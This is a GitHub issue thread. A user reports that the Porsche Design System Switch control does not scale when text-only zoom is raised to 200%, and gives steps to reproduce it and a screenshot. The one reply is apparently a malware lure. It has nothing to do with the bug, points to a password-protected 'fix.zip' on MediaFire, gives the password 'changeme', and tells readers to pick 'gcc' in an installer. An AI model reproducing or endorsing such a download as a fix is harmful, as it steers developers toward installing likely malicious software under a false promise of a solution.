### ISSUE TITLE
[BUG] - Switch component doesn't scale correctly if text-only is zoomed

### ISSUE THREAD

**Issue by o-hook** [porsche-design-system/porsche-design-system#3479]
### JS Framework

all

### Porsche Design System version

3.18.0

### On which device(s) you can see the bug?

all

### In which browsers you can see the bug?

all

### Browser version

all

### Reproduction Example

Storefront

### Steps to reproduce the behavior

1. Go to https://designsystem.porsche.com/v3/components/switch/examples
2. Click on scale text-only up to 200%
3. See error'

### Expected behavior

Also the Switch control scales up coherently with the text in zoomed mode

### Relevant log output
<img width="588" alt="Bildschirmfoto 2024-08-26 um 10 58 41" src="https://github.com/user-attachments/assets/a6ef11f8-1562-4dd1-927a-cc7cea842170">

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
